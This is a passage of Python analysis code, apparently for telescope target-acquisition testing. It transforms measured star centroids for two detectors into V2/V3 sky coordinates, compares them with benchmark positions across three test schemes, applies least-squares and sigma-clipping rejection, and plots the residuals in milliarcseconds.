Returns:\n case = string, string, for example 'Scene2_rapid_real_bgFrac'\n Tbench_Vs_list = list of benchmark V2 and V3s\n T_Vs = list of measured V2 and V3s\n T_diffVs = list of true-measured V2s and V3s\n LS_res = list, std deviations and means from least squared routine\n '''\n\n # unfold variables\n primary_params1, primary_params2, primary_params3 = primary_params\n do_plots, save_plots, show_plots, detector, output_full_detector, show_onscreen_results, show_pixpos_and_v23_plots, save_text_file = primary_params1\n save_centroid_disp, keep_bad_stars, keep_ugly_stars, just_least_sqares, stars_in_sample, scene, background_method, background2use = primary_params2\n shutters, noise, filter_input, test2perform, Nsigma, abs_threshold, abs_threshold, min_elements, max_iters_Nsig = primary_params3\n secondary_params1, secondary_params2, secondary_params3 = secondary_params\n checkbox_size, xwidth_list, ywidth_list, vlim, threshold, max_iter, verbose = secondary_params1\n debug, arcsecs, determine_moments, display_master_img, show_centroids, show_disp = secondary_params2\n Pier_corr, tilt, backgnd_subtraction_method, random_sample = secondary_params3\n bench_V2P1, bench_V3P1, bench_V2P2, bench_V3P2 = benchmark_V2V3_sampleP1P2\n trueVsP1 = [bench_V2P1, bench_V3P1]\n trueVsP2 = [bench_V2P2, bench_V3P2]\n\n # transform into sky coordinates\n #case2study = [scene, shutters, noise, bg_choice]\n if type(detector) is not str:\n det = repr(detector)\n else:\n det = '2Dets'\n case = det+\"Scene\"+str(scene)+\"_\"+shutters+\"_\"+noise+bg_choice+repr(background2use)+'_Nsigma'+repr(Nsigma)\n if extra_string is not None:\n case += extra_string\n\n # Now run the tests\n transf_direction = \"forward\"\n detectors = [491, 492]\n # TEST 1: (a) Avg P1 and P2, (b) transform to V2-V3, (c) compare to avg reference positions (V2-V3 space)\n if test2perform == \"T1\":\n resultsTEST1 = TAf.runTEST(test2perform, detectors, transf_direction, case, stars_sample, P1P2data, bench_starP1,\n trueVsP1, trueVsP2, filter_input, tilt, arcsecs, debug)\n T1P1P2data, T1_transformations, T1_diffs, T1_benchVs_list = resultsTEST1\n T1_V2_3, T1_V3_3, T1_V2_5, T1_V3_5, T1_V2_7, T1_V3_7 = T1_transformations\n T1_diffV2_3, T1_diffV3_3, T1_diffV2_5, T1_diffV3_5, T1_diffV2_7, T1_diffV3_7 = T1_diffs\n T1bench_V2_list, T1bench_V3_list = T1_benchVs_list\n # Get the statistics\n results_stats = TAf.get_stats(T1_transformations, T1_diffs, T1_benchVs_list, Nsigma, max_iters_Nsig,\n arcsecs, just_least_sqares, abs_threshold, min_elements)\n # unfold results\n T1_st_devsAndMeans, T1_diff_counter, 
T1_bench_values, T1_sigmas_deltas, T1_sigma_reject, rejected_elementsLS, rejected_eleNsig, iterations = results_stats\n T1stdev_V2_3, T1mean_V2_3, T1stdev_V2_5, T1mean_V2_5, T1stdev_V2_7, T1mean_V2_7, T1stdev_V3_3, T1mean_V3_3, T1stdev_V3_5, T1mean_V3_5, T1stdev_V3_7, T1mean_V3_7 = T1_st_devsAndMeans\n T1_min_diff, T1_counter = T1_diff_counter\n T1LSdeltas_3, T1LSsigmas_3, T1LSlines2print_3, T1LSdeltas_5, T1LSsigmas_5, T1LSlines2print_5, T1LSdeltas_7, T1LSsigmas_7, T1LSlines2print_7 = T1_sigmas_deltas\n T1sigmaV2_3, T1meanV2_3, T1sigmaV3_3, T1meanV3_3, T1newV2_3, T1newV3_3, T1niter_3, T1lines2print_3, T1sigmaV2_5, T1meanV2_5, T1sigmaV3_5, T1meanV3_5, T1newV2_5, T1newV3_5, T1niter_5, T1lines2print_5, T1sigmaV2_7, T1meanV2_7, T1sigmaV3_7, T1meanV3_7, T1newV2_7, T1newV3_7, T1niter_7, T1lines2print_7 = T1_sigma_reject\n\n # TEST 2: (a) Transform individual P1 and P2 to V2-V3, (b) avg V2-V3 space positions, (c) compare to avg reference positions\n if test2perform == \"T2\":\n resultsTEST2 = TAf.runTEST(test2perform, detectors, transf_direction, case, stars_sample, P1P2data, bench_starP1,\n trueVsP1, trueVsP2, filter_input, tilt, arcsecs, debug)\n T2P1P2data, T2_transformations, T2_diffs, T2_benchVs_list = resultsTEST2\n T2_V2_3, T2_V3_3, T2_V2_5, T2_V3_5, T2_V2_7, T2_V3_7 = T2_transformations\n T2_diffV2_3, T2_diffV3_3, T2_diffV2_5, T2_diffV3_5, T2_diffV2_7, T2_diffV3_7 = T2_diffs\n T2bench_V2_list, T2bench_V3_list = T2_benchVs_list\n # Get the statistics\n results_stats = TAf.get_stats(T2_transformations, T2_diffs, T2_benchVs_list, Nsigma, max_iters_Nsig,\n arcsecs, just_least_sqares, abs_threshold, min_elements)\n # unfold results\n T2_st_devsAndMeans, T2_diff_counter, T2_bench_values, T2_sigmas_deltas, T2_sigma_reject, rejected_elementsLS, rejected_eleNsig, iterations = results_stats\n T2stdev_V2_3, T2mean_V2_3, T2stdev_V2_5, T2mean_V2_5, T2stdev_V2_7, T2mean_V2_7, T2stdev_V3_3, T2mean_V3_3, T2stdev_V3_5, T2mean_V3_5, T2stdev_V3_7, T2mean_V3_7 = T2_st_devsAndMeans\n T2_min_diff, T2_counter = T2_diff_counter\n T2LSdeltas_3, T2LSsigmas_3, T2LSlines2print_3, T2LSdeltas_5, T2LSsigmas_5, T2LSlines2print_5, T2LSdeltas_7, T2LSsigmas_7, T2LSlines2print_7 = T2_sigmas_deltas\n T2sigmaV2_3, T2meanV2_3, T2sigmaV3_3, T2meanV3_3, T2newV2_3, T2newV3_3, T2niter_3, T2lines2print_3, T2sigmaV2_5, T2meanV2_5, T2sigmaV3_5, T2meanV3_5, T2newV2_5, T2newV3_5, T2niter_5, T2lines2print_5, T2sigmaV2_7, T2meanV2_7, T2sigmaV3_7, T2meanV3_7, T2newV2_7, T2newV3_7, T2niter_7, T2lines2print_7 = T2_sigma_reject\n\n # TEST 3: (a) Transform P1 and P2 individually to V2-V3 (b) compare star by star and position by position\n if test2perform == \"T3\":\n resultsTEST3 = TAf.runTEST(test2perform, detectors, transf_direction, case, stars_sample, P1P2data, bench_starP1,\n trueVsP1, trueVsP2, filter_input, tilt, arcsecs, debug)\n T3P1P2data, T3_transformations, T3_diffs, T3_benchVs_list = resultsTEST3\n x13,y13, x23,y23, x15,y15, x25,y25, x17,y17, x27,y27 = T3P1P2data\n T_V2_3, T_V3_3, T_V2_5, T_V3_5, T_V2_7, T_V3_7 = T3_transformations\n T3_V2_13, T3_V2_23 = T_V2_3\n T3_V3_13, T3_V3_23 = T_V3_3\n T3_V2_15, T3_V2_25 = T_V2_5\n T3_V3_15, T3_V3_25 = T_V3_5\n T3_V2_17, T3_V2_27 = T_V2_7\n T3_V3_17, T3_V3_27 = T_V3_7\n T_diffV2_3, T_diffV3_3, T_diffV2_5, T_diffV3_5, T_diffV2_7, T_diffV3_7 = T3_diffs\n T3_diffV2_13, T3_diffV2_23 = T_diffV2_3\n T3_diffV3_13, T3_diffV3_23 = T_diffV3_3\n T3_diffV2_15, T3_diffV2_25 = T_diffV2_5\n T3_diffV3_15, T3_diffV3_25 = T_diffV3_5\n T3_diffV2_17, T3_diffV2_27 = T_diffV2_7\n T3_diffV3_17, T3_diffV3_27 = 
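Tests T1 and T2 above differ only in where the averaging happens: T1 averages positions 1 and 2 in pixel space and transforms the mean to V2/V3, while T2 transforms each position and averages in sky coordinates. A toy numpy sketch of why the two orders disagree, with a made-up nonlinear mapping standing in for the real detector-to-sky transform (which is not shown in this excerpt):

```python
import numpy as np

def to_sky(xy):
    # Stand-in for the pixel-to-V2/V3 transform; deliberately nonlinear so
    # that the two averaging orders give different answers (as they do for
    # the real distortion solution).
    x, y = xy
    return np.array([x + 1e-3 * x * y, y - 1e-3 * x * x])

p1 = np.array([100.0, 200.0])   # measured position 1 (pixels)
p2 = np.array([103.0, 198.0])   # measured position 2 (pixels)

t1 = to_sky((p1 + p2) / 2.0)            # T1: average in pixels, then transform
t2 = (to_sky(p1) + to_sky(p2)) / 2.0    # T2: transform each, average in sky
print(t1 - t2)  # nonzero: the two schemes are genuinely different tests
```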
T_diffV3_7\n T3bench_V2_list, T3bench_V3_list = T3_benchVs_list\n T3bench_V2_listP1, T3bench_V2_listP2 = T3bench_V2_list\n T3bench_V3_listP1, T3bench_V3_listP2 = T3bench_V3_list\n # combine the arrays (positions 1 and 2)\n T3_V2_3, T3_V2_5, T3_V2_7 = np.array([]), np.array([]), np.array([])\n T3_V2_3 = TAf.combine2arrays(T3_V2_13, T3_V2_23, T3_V2_3)\n T3_V2_5 = TAf.combine2arrays(T3_V2_15, T3_V2_25, T3_V2_5)\n T3_V2_7 = TAf.combine2arrays(T3_V2_17, T3_V2_27, T3_V2_7)\n T3_V3_3, T3_V3_5, T3_V3_7 = np.array([]), np.array([]), np.array([])\n T3_V3_3 = TAf.combine2arrays(T3_V3_13, T3_V3_23, T3_V3_3)\n T3_V3_5 = TAf.combine2arrays(T3_V3_15, T3_V3_25, T3_V3_5)\n T3_V3_7 = TAf.combine2arrays(T3_V3_17, T3_V3_27, T3_V3_7)\n T3_diffV2_3, T3_diffV2_5, T3_diffV2_7 = np.array([]), np.array([]), np.array([])\n T3_diffV2_3 = TAf.combine2arrays(T3_diffV2_13, T3_diffV2_23, T3_diffV2_3)\n T3_diffV2_5 = TAf.combine2arrays(T3_diffV2_15, T3_diffV2_25, T3_diffV2_5)\n T3_diffV2_7 = TAf.combine2arrays(T3_diffV2_17, T3_diffV2_27, T3_diffV2_7)\n T3_diffV3_3, T3_diffV3_5, T3_diffV3_7 = np.array([]), np.array([]), np.array([])\n T3_diffV3_3 = TAf.combine2arrays(T3_diffV3_13, T3_diffV3_23, T3_diffV3_3)\n T3_diffV3_5 = TAf.combine2arrays(T3_diffV3_15, T3_diffV3_25, T3_diffV3_5)\n T3_diffV3_7 = TAf.combine2arrays(T3_diffV3_17, T3_diffV3_27, T3_diffV3_7)\n T3bench_V2_list, T3bench_V3_list = np.array([]), np.array([])\n T3bench_V2_list = TAf.combine2arrays(np.array(T3bench_V2_listP1), np.array(T3bench_V2_listP2), T3bench_V2_list)\n T3bench_V3_list = TAf.combine2arrays(np.array(T3bench_V3_listP1), np.array(T3bench_V3_listP2), T3bench_V3_list)\n T3bench_V2_list.tolist()\n T3bench_V3_list.tolist()\n # Get the statistics\n T3_transformations = [T3_V2_3, T3_V3_3, T3_V2_5, T3_V3_5, T3_V2_7, T3_V3_7]\n T3_diffs = [T3_diffV2_3, T3_diffV3_3, T3_diffV2_5, T3_diffV3_5, T3_diffV2_7, T3_diffV3_7]\n T3_benchVs_list = [T3bench_V2_list, T3bench_V3_list]\n results_stats = TAf.get_stats(T3_transformations, T3_diffs, T3_benchVs_list, Nsigma, max_iters_Nsig,\n arcsecs, just_least_sqares, abs_threshold, min_elements)\n # unfold results\n T3_st_devsAndMeans, T3_diff_counter, T3_bench_values, T3_sigmas_deltas, T3_sigma_reject, rejected_elementsLS, rejected_eleNsig, iterations = results_stats\n T3stdev_V2_3, T3mean_V2_3, T3stdev_V2_5, T3mean_V2_5, T3stdev_V2_7, T3mean_V2_7, T3stdev_V3_3, T3mean_V3_3, T3stdev_V3_5, T3mean_V3_5, T3stdev_V3_7, T3mean_V3_7 = T3_st_devsAndMeans\n T3_min_diff, T3_counter = T3_diff_counter\n T3LSdeltas_3, T3LSsigmas_3, T3LSlines2print_3, T3LSdeltas_5, T3LSsigmas_5, T3LSlines2print_5, T3LSdeltas_7, T3LSsigmas_7, T3LSlines2print_7 = T3_sigmas_deltas\n T3sigmaV2_3, T3meanV2_3, T3sigmaV3_3, T3meanV3_3, T3newV2_3, T3newV3_3, T3niter_3, T3lines2print_3, T3sigmaV2_5, T3meanV2_5, T3sigmaV3_5, T3meanV3_5, T3newV2_5, T3newV3_5, T3niter_5, T3lines2print_5, T3sigmaV2_7, T3meanV2_7, T3sigmaV3_7, T3meanV3_7, T3newV2_7, T3newV3_7, T3niter_7, T3lines2print_7 = T3_sigma_reject\n\n #plot_v2v3pos = True\n if plot_v2v3pos:\n # plot of sample residual V2 and V3 for positions 1 and 2 for test 3\n fig1 = plt.figure(1, figsize=(12, 10))\n ax1 = fig1.add_subplot(111)\n #plt.suptitle(plot_title, fontsize=18, y=0.96)\n plt.title(case)\n plt.xlabel('V2 Residuals [arcsec]')\n plt.ylabel('V3 Residuals [arcsec]')\n #xlims = [-5.0, 5.0]\n #ylims = [-5.0, 5.0]\n #plt.xlim(xlims[0], xlims[1])\n #plt.ylim(ylims[0], ylims[1])\n #plt.hlines(0.0, xlims[0], xlims[1], colors='k', linestyles='dashed')\n #plt.vlines(0.0, ylims[0], ylims[1], colors='k', 
linestyles='dashed')\n arrx, arry = T3_diffV2_17, T3_diffV3_17\n xP1 = [min(arrx)+min(arrx)*0.5, max(arrx)+max(arrx)*0.5]\n yP1 = [min(arry)+min(arry)*0.5, max(arry)+max(arry)*0.5]\n arrx, arry = T3_diffV2_27, T3_diffV3_27\n xP2 = [min(arrx)+min(arrx)*0.5, max(arrx)+max(arrx)*0.5]\n yP2 = [min(arry)+min(arry)*0.5, max(arry)+max(arry)*0.5]\n # determine qhich limit is larger in P1\n if xP1[1] > yP1[1]:\n larP1 = xP1[1]\n else:\n larP1 = yP1[1]\n if xP2[1] > yP2[1]:\n larP2 = xP2[1]\n else:\n larP2 = yP2[1]\n if larP1 > larP2:\n uplim = larP1\n lolim = -1 * larP1\n else:\n uplim = larP2\n lolim = -1 * larP2\n plt.xlim(lolim, uplim)\n plt.ylim(lolim, uplim)\n plt.hlines(0.0, lolim, uplim, colors='k', linestyles='dashed')\n plt.vlines(0.0, lolim, uplim, colors='k', linestyles='dashed')\n # plot measured positions\n plt.plot(T3_diffV2_13, T3_diffV3_13, 'b^', ms=10, alpha=0.5, label='CentroidWindow3_P1')\n plt.plot(T3_diffV2_15, T3_diffV3_15, 'go', ms=10, alpha=0.5, label='CentroidWindow5_P1')\n plt.plot(T3_diffV2_17, T3_diffV3_17, 'r*', ms=13, alpha=0.5, label='CentroidWindow7_P1')\n plt.plot(T3_diffV2_23, T3_diffV3_23, 'c^', ms=10, alpha=0.5, label='CentroidWindow3_P2')\n plt.plot(T3_diffV2_25, T3_diffV3_25, 'yo', ms=10, alpha=0.5, label='CentroidWindow5_P2')\n plt.plot(T3_diffV2_27, T3_diffV3_27, 'm*', ms=13, alpha=0.5, label='CentroidWindow7_P2')\n # Shrink current axis by 20%\n box = ax1.get_position()\n ax1.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n ax1.legend(loc='center left', bbox_to_anchor=(1, 0.5)) # put legend out of the plot box\n x_reject, y_reject = [-1.0, 1.0], [-1.0, 1.0]\n for si, xi, yi in zip(stars_sample, T3_diffV2_13, T3_diffV3_13):\n #if yi >= y_reject[1] or yi <= y_reject[0] or xi >= x_reject[1] or xi <= x_reject[0]:\n si = int(si)\n subxcoord, subycoord = 5, 0\n side = 'left'\n plt.annotate('{}'.format(si), xy=(xi,yi), xytext=(subxcoord, subycoord), ha=side, textcoords='offset points')\n for si, xi, yi in zip(stars_sample, T3_diffV2_23, T3_diffV3_23):\n #if yi >= y_reject[1] or yi <= y_reject[0] or xi >= x_reject[1] or xi <= x_reject[0]:\n si = int(si)\n subxcoord, subycoord = 5, 0\n side = 'left'\n plt.annotate('{}'.format(si), xy=(xi,yi), xytext=(subxcoord, subycoord), ha=side, textcoords='offset points')\n plt.show()\n\n # Print results to screen and save into a text file if told so\n if test2perform == \"T1\":\n Tstdev_Vs = [T1stdev_V2_3, T1stdev_V3_3, T1stdev_V2_5, T1stdev_V3_5, T1stdev_V2_7, T1stdev_V3_7]\n Tmean_Vs = [T1mean_V2_3, T1mean_V3_3, T1mean_V2_5, T1mean_V3_5, T1mean_V2_7, T1mean_V3_7]\n T_diff_counter = [T1_min_diff, T1_counter]\n TLSlines2print = [T1LSlines2print_3, T1LSlines2print_5, T1LSlines2print_7]\n Tlines2print = [T1lines2print_3, T1lines2print_5, T1lines2print_7]\n Tbench_Vs_list = [T1bench_V2_list, T1bench_V3_list]\n T_Vs = [T1_V2_3, T1_V3_3, T1_V2_5, T1_V3_5, T1_V2_7, T1_V3_7]\n T_diffVs = [T1_diffV2_3, T1_diffV3_3, T1_diffV2_5, T1_diffV3_5, T1_diffV2_7, T1_diffV3_7]\n LS_res = [T1LSsigmas_3, T1LSsigmas_5, T1LSsigmas_7, T1LSdeltas_3, T1LSdeltas_5, T1LSdeltas_7]\n\n if test2perform == \"T2\":\n Tstdev_Vs = [T2stdev_V2_3, T2stdev_V3_3, T2stdev_V2_5, T2stdev_V3_5, T2stdev_V2_7, T2stdev_V3_7]\n Tmean_Vs = [T2mean_V2_3, T2mean_V3_3, T2mean_V2_5, T2mean_V3_5, T2mean_V2_7, T2mean_V3_7]\n T_diff_counter = [T2_min_diff, T2_counter]\n TLSlines2print = [T2LSlines2print_3, T2LSlines2print_5, T2LSlines2print_7]\n Tlines2print = [T2lines2print_3, T2lines2print_5, T2lines2print_7]\n Tbench_Vs_list = [T2bench_V2_list, T2bench_V3_list]\n 
T_Vs = [T2_V2_3, T2_V3_3, T2_V2_5, T2_V3_5, T2_V2_7, T2_V3_7]\n T_diffVs = [T2_diffV2_3, T2_diffV3_3, T2_diffV2_5, T2_diffV3_5, T2_diffV2_7, T2_diffV3_7]\n LS_res = [T2LSsigmas_3, T2LSsigmas_5, T2LSsigmas_7, T2LSdeltas_3, T2LSdeltas_5, T2LSdeltas_7]\n\n if test2perform == \"T3\":\n Tstdev_Vs = [T3stdev_V2_3, T3stdev_V3_3, T3stdev_V2_5, T3stdev_V3_5, T3stdev_V2_7, T3stdev_V3_7]\n Tmean_Vs = [T3mean_V2_3, T3mean_V3_3, T3mean_V2_5, T3mean_V3_5, T3mean_V2_7, T3mean_V3_7]\n T_diff_counter = [T3_min_diff, T3_counter]\n TLSlines2print = [T3LSlines2print_3, T3LSlines2print_5, T3LSlines2print_7]\n Tlines2print = [T3lines2print_3, T3lines2print_5, T3lines2print_7]\n Tbench_Vs_list = [T3bench_V2_list, T3bench_V3_list]\n T_Vs = [T3_V2_3, T3_V3_3, T3_V2_5, T3_V3_5, T3_V2_7, T3_V3_7]\n T_diffVs = [T3_diffV2_3, T3_diffV3_3, T3_diffV2_5, T3_diffV3_5, T3_diffV2_7, T3_diffV3_7]\n LS_res = [T3LSsigmas_3, T3LSsigmas_5, T3LSsigmas_7, T3LSdeltas_3, T3LSdeltas_5, T3LSdeltas_7]\n\n LS_info = [iterations, rejected_elementsLS]\n\n if show_onscreen_results or save_text_file:\n TAf.printTESTresults(stars_sample, case, test2perform, arcsecs, Tstdev_Vs, Tmean_Vs, T_diff_counter,\n save_text_file, TLSlines2print, Tlines2print, Tbench_Vs_list, T_Vs, T_diffVs,\n rejected_elementsLS, rejected_eleNsig, background_method, background2use, path4results)\n\n TV2_3, TV3_3, Tbench_V2_3, Tbench_V3_3 = rid_rejected_elements(rejected_elementsLS[0],\n T_Vs[0], T_Vs[1],\n Tbench_Vs_list[0], Tbench_Vs_list[1])\n TV2_5, TV3_5, Tbench_V2_5, Tbench_V3_5 = rid_rejected_elements(rejected_elementsLS[1],\n T_Vs[2], T_Vs[3],\n Tbench_Vs_list[0], Tbench_Vs_list[1])\n TV2_7, TV3_7, Tbench_V2_7, Tbench_V3_7 = rid_rejected_elements(rejected_elementsLS[2],\n T_Vs[4], T_Vs[5],\n Tbench_Vs_list[0], Tbench_Vs_list[1])\n TdiffV2_3, TdiffV3_3, _, _ = rid_rejected_elements(rejected_elementsLS[0],\n T_diffVs[0], T_diffVs[1],\n Tbench_Vs_list[0], Tbench_Vs_list[1])\n TdiffV2_5, TdiffV3_5, _, _ = rid_rejected_elements(rejected_elementsLS[1],\n T_diffVs[2], T_diffVs[3],\n Tbench_Vs_list[0], Tbench_Vs_list[1])\n TdiffV2_7, TdiffV3_7, _, _ = rid_rejected_elements(rejected_elementsLS[2],\n T_diffVs[4], T_diffVs[5],\n Tbench_Vs_list[0], Tbench_Vs_list[1])\n\n Tbench_Vs = [Tbench_V2_3, Tbench_V3_3, Tbench_V2_5, Tbench_V3_5, Tbench_V2_7, Tbench_V3_7]\n T_Vs = [TV2_3, TV3_3, TV2_5, TV3_5, TV2_7, TV3_7]\n T_diffVs = [TdiffV2_3, TdiffV3_3, TdiffV2_5, TdiffV3_5, TdiffV2_7, TdiffV3_7]\n new_stars_sample = ridstars_LSrejection(stars_sample, LS_info)\n\n return case, new_stars_sample, Tbench_Vs, T_Vs, T_diffVs, LS_res, LS_info\n\n\ndef rid_rejected_elements(rejected_elementsLS, TV2, TV3, TrueV2, TrueV3):\n TV2_cwin, TV3_cwin, TrueV2_cwin, TrueV3_cwin = [], [], [], []\n for idx, tv in enumerate(TV2):\n if idx in rejected_elementsLS:\n\n continue\n else:\n TV2_cwin.append(tv)\n TV3_cwin.append(TV3[idx])\n TrueV2_cwin.append(TrueV2[idx])\n TrueV3_cwin.append(TrueV3[idx])\n return TV2_cwin, TV3_cwin, TrueV2_cwin, TrueV3_cwin\n\n\ndef ridstars_LSrejection(stars_sample, LS_info):\n # unfold variables\n _, rejected_elementsLS = LS_info\n # Create a new list with the elements not rejected by the least squares routine\n nw_stars_sample3, nw_stars_sample5, nw_stars_sample7 = [], [], []\n # append to the new lists for centroid window 3\n for i, st in enumerate(stars_sample):\n if i not in rejected_elementsLS[0]:\n nw_stars_sample3.append(st)\n if i not in rejected_elementsLS[1]:\n nw_stars_sample5.append(st)\n if i not in rejected_elementsLS[2]:\n nw_stars_sample7.append(st)\n 
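The `rid_rejected_elements` helper defined below drops least-squares-rejected indices with an explicit loop (and its `if ... continue / else` pair could be flattened to a single `not in` test). An equivalent vectorized sketch using a numpy boolean mask, offered only as an illustration of the same filtering:

```python
import numpy as np

def rid_rejected_elements_np(rejected_idx, TV2, TV3, TrueV2, TrueV3):
    # Keep every index the least-squares routine did not reject.
    keep = ~np.isin(np.arange(len(TV2)), list(rejected_idx))
    arrs = (np.asarray(TV2), np.asarray(TV3),
            np.asarray(TrueV2), np.asarray(TrueV3))
    return tuple(a[keep] for a in arrs)

# e.g. rejected indices {1, 3} keep elements 0, 2, 4 of each array
print(rid_rejected_elements_np({1, 3}, [1, 2, 3, 4, 5], [5, 4, 3, 2, 1],
                               [1, 1, 1, 1, 1], [2, 2, 2, 2, 2]))
```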
new_stars_sample = [nw_stars_sample3, nw_stars_sample5, nw_stars_sample7]\n return new_stars_sample\n\n\ndef convert2milliarcsec(list2convert):\n for i, item in enumerate(list2convert):\n list2convert[i] = item * 1000.0\n return list2convert\n\n\ndef run_testXrandom_stars(stars_sample, primary_params, secondary_params, path4results, gen_path, extra_string):\n '''\n This is the function that coordinates all other functions within this script. It runs the script.\n Args:\n stars_sample: list of stars to analyze\n primary_params: list of 3 lists containing all variables in the primary parameters section\n secondary_params: list of 3 lists containing all variables in the secondary parameters section\n path4results: string of the path to place results\n gen_path: string of path to put plots and other resulting files\n extra_string: additional info added to name of text file with final V2 and V3\n\n Returns:\n results per window size = resulting V2 and V3, benchmark V2 and V3, the corresponding standard deviations,\n the rotation angle, the total number of stars removed as well as the corresponding\n star number, and the total number of iterations\n All of these results are in the following structure:\n results_of_test = [case, new_stars_sample, Tbench_Vs, T_Vs, T_diffVs, LS_res, LS_info] --> per TEST\n results_all_tests = [results_of_test, ...] --> can have only one list if only 1 test was ran\n '''\n\n # Unfold variables\n # primary parameters\n primary_params1, primary_params2, primary_params3 = primary_params\n do_plots, save_plots, show_plots, detector, output_full_detector, show_onscreen_results, show_pixpos_and_v23_plots, save_text_file = primary_params1\n save_centroid_disp, keep_bad_stars, keep_ugly_stars, just_least_sqares, stars_in_sample, scene, background_method, background2use = primary_params2\n shutters, noise, filter_input, test2perform, Nsigma, abs_threshold, abs_threshold, min_elements, max_iters_Nsig = primary_params3\n # secondary parameters\n secondary_params1, secondary_params2, secondary_params3 = secondary_params\n checkbox_size, xwidth_list, ywidth_list, vlim, threshold, max_iter, verbose = secondary_params1\n debug, arcsecs, determine_moments, display_master_img, show_centroids, show_disp = secondary_params2\n Pier_corr, tilt, backgnd_subtraction_method, random_sample = secondary_params3\n\n # Pool of stars to select from\n stars_detectors = range(1, 201) # default is for both detectors\n if detector == 491:\n stars_detectors = range(101, 201) # only detector 491\n elif detector == 492:\n stars_detectors = range(1, 101) # only detector 492\n\n # Loop over list_test2perform\n results_all_tests = []\n if test2perform == \"all\":\n list_test2perform = [\"T1\", \"T2\", \"T3\"]\n if not keep_bad_stars:\n # remove the bad stars and use the same sample for the 3 tests\n stars_sample = TAf.remove_bad_stars(scene, stars_sample, keep_ugly_stars, verbose)\n # but keep the sample stars list with length of desired number of stars\n while len(stars_sample) != stars_in_sample:\n random_star = random.choice(stars_detectors)\n stars_sample.append(random_star)\n stars_sample = list(set(stars_sample))\n # remove the bad stars\n stars_sample = TAf.remove_bad_stars(scene, stars_sample, keep_ugly_stars, verbose)\n keep_bad_stars = True\n else:\n list_test2perform = [test2perform]\n for test2perform in list_test2perform:\n print ('Starting analysis for TEST %s ...' 
% (test2perform))\n # RE-compact variables\n primary_params1 = [do_plots, save_plots, show_plots, detector, output_full_detector, show_onscreen_results,\n show_pixpos_and_v23_plots, save_text_file]\n primary_params2 = [save_centroid_disp, keep_bad_stars, keep_ugly_stars, just_least_sqares, stars_in_sample,\n scene, background_method, background2use]\n primary_params3 = [shutters, noise, filter_input, test2perform, Nsigma, abs_threshold, abs_threshold, min_elements,\n max_iters_Nsig]\n primary_params = [primary_params1, primary_params2, primary_params3]\n secondary_params1 = [checkbox_size, xwidth_list, ywidth_list, vlim, threshold, max_iter, verbose]\n secondary_params2 = [debug, arcsecs, determine_moments, display_master_img, show_centroids, show_disp]\n secondary_params3 = [Pier_corr, tilt, backgnd_subtraction_method, random_sample]\n secondary_params = [secondary_params1, secondary_params2, secondary_params3]\n # Get centroids AND sky positions according to Test\n case, new_stars_sample, Tbench_Vs, T_Vs, T_diffVs, LS_res, LS_info = runXrandomstars(stars_detectors,\n primary_params, secondary_params,\n stars_sample,\n path4results=path4results,\n extra_string=extra_string)\n results_of_test = [case, new_stars_sample, Tbench_Vs, T_Vs, T_diffVs, LS_res, LS_info]\n results_all_tests.append(results_of_test)\n print ('TEST %s finished. \\n' % (test2perform))\n\n\n if do_plots:\n print ('Generating plots...')\n\n # load the data fom the 3 tests\n for resTest in results_all_tests:\n # unfold variables per centroid window results_all_tests[0][5][s][width]\n case, new_stars_sample, Tbench_Vs, T_Vs, T_diffVs, LS_res, _ = resTest\n nw_stars_sample3, nw_stars_sample5, nw_stars_sample7 = new_stars_sample\n Tbench_V2_3, Tbench_V3_3, Tbench_V2_5, Tbench_V3_5, Tbench_V2_7, Tbench_V3_7 = Tbench_Vs\n TV2_3, TV3_3, TV2_5, TV3_5, TV2_7, TV3_7 = T_Vs\n TdiffV2_3, TdiffV3_3, TdiffV2_5, TdiffV3_5, TdiffV2_7, TdiffV3_7 = T_diffVs\n TLSsigmas_3, TLSsigmas_5, TLSsigmas_7, TLSdeltas_3, TLSdeltas_5, TLSdeltas_7 = LS_res\n\n milliarcsec = True\n if milliarcsec:\n TdiffV2_3 = convert2milliarcsec(TdiffV2_3)\n TdiffV3_3 = convert2milliarcsec(TdiffV3_3)\n TdiffV2_5 = convert2milliarcsec(TdiffV2_5)\n TdiffV3_5 = convert2milliarcsec(TdiffV3_5)\n TdiffV2_7 = convert2milliarcsec(TdiffV2_7)\n TdiffV3_7 = convert2milliarcsec(TdiffV3_7)\n TLSsigmas_3 = convert2milliarcsec(TLSsigmas_3)\n TLSsigmas_5 = convert2milliarcsec(TLSsigmas_5)\n TLSsigmas_7 = convert2milliarcsec(TLSsigmas_7)\n TLSdeltas_3 = convert2milliarcsec(TLSdeltas_3)\n TLSdeltas_5 = convert2milliarcsec(TLSdeltas_5)\n TLSdeltas_7 = convert2milliarcsec(TLSdeltas_7)\n\n # do the plots -> 2 plots per centroid window\n for cwin in xwidth_list:\n cwincase = case+'_CentroidWindow'+repr(cwin)\n\n # Plot to compare the mean values for the 3 tests -- plot only has 3 points\n plot_title = r'Residual Mean Values, $\\mu$'\n xlabel = r'$\\Delta$V2 [marcsec]'\n ylabel = r'$\\Delta$V3 [marcsec]'\n destination = os.path.join(gen_path, 'plots/means_Cwin'+repr(cwin)+'.jpg')\n if cwin == 3:\n s, d, v = 0, 3, 0\n if cwin == 5:\n s, d, v = 1, 4, 2\n if cwin == 7:\n s, d, v = 2, 5, 4\n if len(list_test2perform) != 3:\n T1sigmaV2 = results_all_tests[0][5][s][0] # Test ran sigma V2 value\n T1sigmaV3 = results_all_tests[0][5][s][1] # Test ran sigma V3 value\n T1meanV3 = results_all_tests[0][5][d][1] # Test ran mean V3 value\n T1meanV2 = results_all_tests[0][5][d][0] # Test ran mean V2 value\n if test2perform == \"T1\":\n labels_list = ['Avg in Pixel Space']\n if test2perform == \"T2\":\n 
labels_list = ['Avg in Sky']\n if test2perform == \"T3\":\n labels_list = ['No Avg']\n arrx = [T1meanV2]\n arry = [T1meanV3]\n print_side_values = [T1sigmaV2, T1meanV2, T1sigmaV3, T1meanV3]\n if len(list_test2perform) == 3:\n T1sigmaV2 = results_all_tests[0][5][s][0] # Test 1 ran sigma V2 value\n T1sigmaV3 = results_all_tests[0][5][s][1] # Test 1 ran sigma V3 value\n T1meanV3 = results_all_tests[0][5][d][1] # Test 1 ran mean V3 value\n T1meanV2 = results_all_tests[0][5][d][0] # Test 1 ran mean V2 value\n T2sigmaV2 = results_all_tests[1][5][s][0] # Test 2\n T2sigmaV3 = results_all_tests[1][5][s][1] # Test 2\n T2meanV2 = results_all_tests[1][5][d][0] # Test 2\n T2meanV3 = results_all_tests[1][5][d][1] # Test 2\n T3sigmaV2 = results_all_tests[2][5][s][0] # Test 3\n T3sigmaV3 = results_all_tests[2][5][s][1] # Test 3\n T3meanV2 